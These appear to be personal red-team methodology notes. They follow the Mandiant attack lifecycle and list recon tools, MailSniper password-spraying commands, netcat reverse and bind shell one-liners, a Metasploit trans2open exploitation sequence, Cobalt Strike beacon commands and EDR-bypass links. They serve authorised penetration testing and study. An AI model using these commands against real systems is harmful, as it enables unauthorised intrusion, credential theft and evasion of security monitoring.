Red Teaming

Aligned with the Mandiant Threat Lifecycle

Initial Reconnaissance

research the target systems and employees to develop a methodology for the intrusion.

• breached credentials
• OSINT

Scanning Infrastrucuture:

• nmap
• openVAS
• Azure Testing Methodology

Scanning Websites:

• subdomain enumeration
• Web Pen-Testing

Web OSINT

subdomain searching

• https://centralops.net/co/
• https://dnslytics.com/reverse-ip
• virustotal can also be used to get some web information
• google analytics can tie other websites
• reddit.com/domain/$domainname
• backlinkwatch.com
• viewdns.info
• shodan.io
  • city:vienna port:3389
• https://pentest-tools.com/information-gathering/find-subdomains-of-domain#
• crt.sh: search for %tesla.com

You can combine some simple tools to enumerate and screenshot domains

cat tesla.txt | sort -u | httprobe -s -p https:443
gowitness file -f ./alive.txt -P ./pics --no-http

identify web technology

• identifying web-site technology
  • buildwith.com
  • wappalyzer
  • whatweb (CLI)
• https://spyonweb.com/snikt.net
• amass
• dnsrecon
• https://github.com/six2dez/reconftw

Initial Compromise

execute malicious code on one or more targets via the attack vector planned during phase 1.

• o365creeper
• 1_Initial_Compromise_through_Email : der “send malware part”
• wlan testing
• Red Teaming

password spraying

• office 365

  • TREVORspray
    • teams/onecloud/outlook/etc.

• OWA

  • metasploit → aux/scanner/http/owa_login
    • RHOST, PASSWORD, USERNAME/USER_FILE/USER_PASS_FILE

• other portals

  • BURP repeater/intruder..
  • sniper → only one
  • pitchfork → 1st/1st, 2nd/2nd
  • clusterbomb

• mfasweeper

using mailsniper

While mailsniper is rather used to search through Exchange365, it has multiple modules that allow for password spraying:

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt

• https://github.com/dafthack/MailSniper
• https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/

check for exploits

• edb, rapid7
• searchsploit
  • do this rather fuzzy
  • search for remote exploits

exploitation

• reverse shell: “nc -nvlp 4444” und “nc 127.0.0.1 4444 -e /bin/bash”

• bind shell: “nc -nvlp 4444 -e /bin/bash” and “nc 127.0.0.1 4444”

• meterpreter

  • stages: windows/meterpreter/reverse_tcp vs.
  • non-staged: windows/meterpreter_reverse_tcp
  • then test bind shell (staged/non-staged), not every payload is the right payload

• gaining root with meterpreter

  • msfconsole
    • search trans2open
    • use exploit/linux/samba/trans2open
    • set RHOST 192.168.57.134
    • show targets
    • exploit
    • opens and closes meterpreter sessions (reason died)
    • options (now shows payloads)
    • set payload linux/x86/shell_reverse_tcp
    • exploit

• exploit 80/443 (apache) manually

  • get exploit from github
  • chose the right exploit (from enumeration)
  • this is not real exploit writing..

Establish Foothold

maintain continued control over a compromised system by installing persistent backdoors.

Here we would have host reconnaissance

seatbelt

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Talking about installing an initial foothold, e.g., Registry Autoruns, Scheduled Tasks, Startup Folder

ShaPersist

Escalate Privileges

exploit system vulnerabilities or misconfigurations to obtain local admin access to compromised systems.

linux-priv-esc Windows Enum and Priv-Esc 3_Host_Privilege_Escalation

https://github.com/cobalt-strike/ElevateKit

EDR bypass

• https://github.com/tkmru/awesome-edr-bypass
• https://github.com/klezVirus/inceptor/wiki/Examples-by-scenario
• https://github.com/naksyn/Pyramid

Internal Reconnaissance, Priv-Esc and Lateral Movement

explore the target’s internal infrastructure and environment.

• AD Assumed Breach
• Azure Testing Methodology

Credential threat is happening here maybe?

domain recon

powerview sharpview adsearch

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

Move Laterally

use credentials obtained from phase 4 to compromise additional systems.

AD Assumed Breach azure background

Maintain Presence

maintain highly privileged access to domains and systems.

with root permissions we can elevate our foothold too

• install new services (instead of modifying existing ones)
• https://github.com/Sw4mpf0x/PowerLurk

Complete Mission

accomplish the operational objective.